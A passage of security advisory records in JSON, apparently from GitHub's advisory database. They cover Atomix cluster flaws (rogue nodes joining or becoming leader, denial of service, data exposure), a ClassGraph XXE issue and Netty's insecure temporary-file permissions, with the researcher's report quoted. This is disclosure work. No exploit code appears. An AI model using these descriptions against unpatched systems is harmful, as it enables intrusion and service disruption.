"github_reviewed_at": "2021-12-17T18:42:16Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4jhc-wjr3-pwh2", "published": "2021-12-17T20:40:38Z", "modified": "2024-12-03T06:05:23.847552Z", "aliases": [ "CVE-2020-35211" ], "summary": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node.", "details": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node in a target cluster via manipulation of the variable terms in RaftContext.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { 
"source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-4jhc-wjr3-pwh2/GHSA-4jhc-wjr3-pwh2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35211" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1C_IpRfSU-9FMezcHCFZ-qg-15JO-W36yvqcnzI8sQs8/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2021-12-17T18:48:40Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6vvh-5794-vpmj", "published": "2021-12-17T20:40:58Z", "modified": "2023-11-08T04:03:33.073526Z", "aliases": [ "CVE-2020-35216" ], "summary": "An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false member down event messages.", "details": "An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false member down event messages.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", 
"2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-6vvh-5794-vpmj/GHSA-6vvh-5794-vpmj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35216" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1woXwR3vciv7ltFan6LyK5vsWXmaUi8ArZonhk80Gr5U/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [ "CWE-362" ], "github_reviewed": true, "github_reviewed_at": "2021-12-17T15:12:52Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7fr2-94h7-ccg2", "published": "2021-12-17T20:41:33Z", "modified": "2024-12-03T06:08:49.974429Z", "aliases": [ "CVE-2020-35209" ], "summary": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to join a target cluster via providing configuration information.", "details": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to join a target cluster via providing configuration information.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", 
"0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-7fr2-94h7-ccg2/GHSA-7fr2-94h7-ccg2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35209" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1W5KU7ffh4dheR8iD54ulABImi6byAhSI-OhEKw2adRo/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2021-12-17T18:40:51Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g7p8-r2ch-4rmf", "published": "2021-12-17T20:41:45Z", "modified": "2023-11-08T04:03:33.012848Z", "aliases": [ "CVE-2020-35215" ], "summary": "Malicious Atomix node queries expose sensitive 
information", "details": "An issue in Atomix v3.1.5 allows attackers to access sensitive information when a malicious Atomix node queries distributed variable primitives which contain the entire primitive lists that ONOS nodes use to share important states.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-g7p8-r2ch-4rmf/GHSA-g7p8-r2ch-4rmf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35215" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1pRRLfdSUqUZ688CZ9e9AyceuXPGp9oyGj7j4bdSsBcw/edit?usp=sharing" }, { "type": 
"PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [ "CWE-668" ], "github_reviewed": true, "github_reviewed_at": "2021-12-17T19:00:58Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-m4h3-7mc2-v295", "published": "2021-12-17T20:41:21Z", "modified": "2024-12-03T05:58:28.108466Z", "aliases": [ "CVE-2020-35214" ], "summary": "An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.", "details": "An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", 
"3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-m4h3-7mc2-v295/GHSA-m4h3-7mc2-v295.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35214" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1wJi4QJko5ZCdADuzmAG9ed-nQLyJVkLBJf6cylAL71A/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2021-12-17T19:11:26Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mf27-wg66-m8f5", "published": "2021-12-17T20:41:09Z", "modified": "2023-11-08T04:03:32.770438Z", "aliases": [ "CVE-2020-35210" ], "summary": "A vulnerability in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via a Raft session flooding attack using Raft OpenSessionRequest messages.", "details": "A vulnerability in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via a Raft session flooding attack using Raft OpenSessionRequest messages.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", 
"2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-mf27-wg66-m8f5/GHSA-mf27-wg66-m8f5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35210" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1eZznIciFI06_5UJrXvlLugH2-nmjfYpQO5NyNMc9RxU/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-12-17T17:20:09Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v2xm-76pq-phcf", "published": "2024-06-21T06:31:12Z", "modified": "2024-06-25T02:34:01.955562Z", "aliases": [ "CVE-2021-47621" ], "related": [ "CGA-654j-wjm3-qmg4", "CGA-g2q2-9vqg-g6xm", "CGA-pq95-x78h-qx9r" ], "summary": "ClassGraph XML External Entity Reference", "details": "ClassGraph before 4.8.112 was not resistant to XML eXternal Entity (XXE) attacks.", "affected": [ { "package": { "name": "io.github.classgraph:classgraph", "ecosystem": "Maven", "purl": 
"pkg:maven/io.github.classgraph/classgraph" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.8.112" } ] } ], "versions": [ "4.0.0", "4.0.0-beta-11", "4.0.0-beta-12", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.0.6", "4.0.7", "4.1.0", "4.1.1", "4.1.2", "4.1.3", "4.1.4", "4.1.5", "4.1.6", "4.1.7", "4.2.0", "4.2.1", "4.2.10", "4.2.11", "4.2.12", "4.2.2", "4.2.3", "4.2.4", "4.2.5", "4.2.6", "4.2.7", "4.2.8", "4.2.9", "4.3.0", "4.3.1", "4.4.0", "4.4.1", "4.4.10", "4.4.11", "4.4.12", "4.4.2", "4.4.3", "4.4.4", "4.4.5", "4.4.6", "4.4.7", "4.4.8", "4.4.9", "4.6.0", "4.6.1", "4.6.10", "4.6.11", "4.6.12", "4.6.13", "4.6.14", "4.6.15", "4.6.16", "4.6.17", "4.6.18", "4.6.19", "4.6.2", "4.6.20", "4.6.21", "4.6.22", "4.6.23", "4.6.24", "4.6.25", "4.6.26", "4.6.27", "4.6.28", "4.6.29", "4.6.3", "4.6.30", "4.6.31", "4.6.32", "4.6.4", "4.6.5", "4.6.6", "4.6.7", "4.6.8", "4.6.9", "4.8.0", "4.8.1", "4.8.10", "4.8.100", "4.8.101", "4.8.102", "4.8.103", "4.8.104", "4.8.105", "4.8.106", "4.8.107", "4.8.108", "4.8.109", "4.8.11", "4.8.110", "4.8.111", "4.8.12", "4.8.13", "4.8.14", "4.8.15", "4.8.16", "4.8.17", "4.8.19", "4.8.2", "4.8.20", "4.8.21", "4.8.22", "4.8.23", "4.8.24", "4.8.25", "4.8.26", "4.8.27", "4.8.28", "4.8.29", "4.8.3", "4.8.30", "4.8.31", "4.8.32", "4.8.33", "4.8.34", "4.8.35", "4.8.36", "4.8.37", "4.8.38", "4.8.39", "4.8.4", "4.8.40", "4.8.41", "4.8.42", "4.8.43", "4.8.44", "4.8.45", "4.8.46", "4.8.47", "4.8.48", "4.8.49", "4.8.5", "4.8.50", "4.8.51", "4.8.52", "4.8.53", "4.8.54", "4.8.55", "4.8.56", "4.8.57", "4.8.58", "4.8.59", "4.8.6", "4.8.60", "4.8.61", "4.8.62", "4.8.63", "4.8.64", "4.8.65", "4.8.66", "4.8.67", "4.8.68", "4.8.69", "4.8.7", "4.8.70", "4.8.71", "4.8.72", "4.8.73", "4.8.74", "4.8.75", "4.8.76", "4.8.77", "4.8.78", "4.8.79", "4.8.8", "4.8.80", "4.8.81", "4.8.82", "4.8.83", "4.8.84", "4.8.85", "4.8.86", "4.8.87", "4.8.88", "4.8.89", "4.8.9", "4.8.90", "4.8.91", "4.8.92", "4.8.93", "4.8.94", "4.8.95", "4.8.96", 
"4.8.97", "4.8.98" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-v2xm-76pq-phcf/GHSA-v2xm-76pq-phcf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47621" }, { "type": "WEB", "url": "https://github.com/classgraph/classgraph/pull/539" }, { "type": "WEB", "url": "https://github.com/classgraph/classgraph/commit/681362ad6b0b9d9abaffb2e07099ce54d7a41fa3" }, { "type": "WEB", "url": "https://docs.r3.com/en/platform/corda/4.8/enterprise/release-notes-enterprise.html" }, { "type": "PACKAGE", "url": "https://github.com/classgraph/classgraph" }, { "type": "WEB", "url": "https://github.com/classgraph/classgraph/releases/tag/classgraph-4.8.112" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2024-06-21T15:06:26Z", "nvd_published_at": "2024-06-21T06:15:10Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5mcr-gq6c-3hq2", "published": "2021-02-08T21:17:48Z", "modified": "2025-01-14T10:57:08.719345Z", "aliases": [ "CVE-2021-21290" ], "related": [ "CGA-5mv3-2mc9-76x5", "CGA-qrw9-p79v-r8f7", "CVE-2021-21290", "CVE-2022-24823" ], "summary": "Local Information Disclosure Vulnerability in Netty on Unix-Like systems", "details": "### Impact\n\nWhen netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled.\n\nThe CVSSv3.1 score of this vulnerability is calculated to be a [6.2/10](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\u0026version=3.1)\n\n### Vulnerability Details\n\nOn unix-like systems, the temporary directory is shared 
between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems.\n\nThe method `File.createTempFile` on unix-like systems creates a random file, but, by default will create this file with the permissions `-rw-r--r--`. Thus, if sensitive information is written to this file, other local users can read this information.\n\nThis is the case in netty's `AbstractDiskHttpData` is vulnerable.\n\nhttps://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/codec-http/src/main/java/io/netty/handler/codec/http/multipart/AbstractDiskHttpData.java#L80-L101\n\n`AbstractDiskHttpData` is used as a part of the `DefaultHttpDataFactory` class which is used by `HttpPostRequestDecoder` / `HttpPostMultiPartRequestDecoder`.\n\nYou may be affected by this vulnerability your project contains the following code patterns:\n\n```java\nchannelPipeline.addLast(new HttpPostRequestDecoder(...));\n```\n\n```java\nchannelPipeline.addLast(new HttpPostMultiPartRequestDecoder(...));\n```\n\n### Patches\n\nThis has been patched in version `4.1.59.Final`.\n\n### Workarounds\n\nSpecify your own `java.io.tmpdir` when you start the JVM or use `DefaultHttpDataFactory.setBaseDir(...)` to set the directory to something that is only readable by the current user.\n\n### References\n\n - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)\n - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)\n\n### Similar Vulnerabilities\n\nSimilar, but not the same.\n\n - JUnit 4 - https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp\n - Google Guava - https://github.com/google/guava/issues/4011\n - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945\n - JetBrains Kotlin Compiler - 
https://nvd.nist.gov/vuln/detail/CVE-2020-15824\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [netty](https://github.com/netty/netty)\n* Email us [here](mailto:netty-security@googlegroups.com)\n\n### Original Report\n\n\u003e Hi Netty Security Team,\n\u003e \n\u003e I've been working on some security research leveraging custom CodeQL queries to detect local information disclosure vulnerabilities in java applications. This was the result from running this query against the netty project:\n\u003e https://lgtm.com/query/7723301787255288599/\n\u003e \n\u003e Netty contains three local information disclosure vulnerabilities, so far as I can tell.\n\u003e \n\u003e One is here, where the private key for the certificate is written to a temporary file.\n\u003e \n\u003e https://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/handler/src/main/java/io/netty/handler/ssl/util/SelfSignedCertificate.java#L316-L346\n\u003e \n\u003e One is here, where the certificate is written to a temporary file.\n\u003e \n\u003e https://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/handler/src/main/java/io/netty/handler/ssl/util/SelfSignedCertificate.java#L348-L371\n\u003e \n\u003e The final one is here, where the 'AbstractDiskHttpData' creates a temporary file if the getBaseDirectory() method returns null. I believe that 'AbstractDiskHttpData' is used as a part of the file upload support? If this is the case, any files uploaded would be similarly vulnerable.\n\u003e \n\u003e https://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/codec-http/src/main/java/io/netty/handler/codec/http/multipart/AbstractDiskHttpData.java#L91\n\u003e \n\u003e All of these vulnerabilities exist because `File.createTempFile(String, String)` will create a temporary file in the system temporary directory if the 'java.io.tmpdir' system property is not explicitly set. 
It is my understanding that when java creates a file, by default, and using this method, the permissions on that file utilize the umask. In a majority of cases, this means that the file that java creates has the permissions: `-rw-r--r--`, thus, any other local user on that system can read the contents of that file.\n\u003e \n\u003e Impacted OS:\n\u003e - Any OS where the system temporary directory is shared between multiple users. This is not the case for MacOS or Windows.\n\u003e \n\u003e Mitigation.\n\u003e \n\u003e Moving to the `Files` API instead will fix this vulnerability. \n\u003e https://docs.oracle.com/javase/8/docs/api/java/nio/file/Files.html#createTempFile-java.nio.file.Path-java.lang.String-java.lang.String-java.nio.file.attribute.FileAttribute...-\n\u003e \n\u003e This API will explicitly set the posix file permissions to something safe, by default.\n\u003e \n\u003e I recently disclosed a similar vulnerability in JUnit 4:\n\u003e https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp\n\u003e \n\u003e If you're also curious, this vulnerability in Jetty was also mine, also involving temporary directories, but is not the same vulnerability as in this case.\n\u003e https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6\n\u003e \n\u003e I would appreciate it if we could perform disclosure of this vulnerability leveraging the GitHub security advisories feature here. GitHub has a nice credit system that I appreciate, plus the disclosures, as you can see from the sampling above, end up looking very nice.\n\u003e https://github.com/netty/netty/security/advisories\n\u003e \n\u003e This vulnerability disclosure follows Google's [90-day vulnerability disclosure policy](https://www.google.com/about/appsecurity/) (I'm not an employee of Google, I just like their policy). 
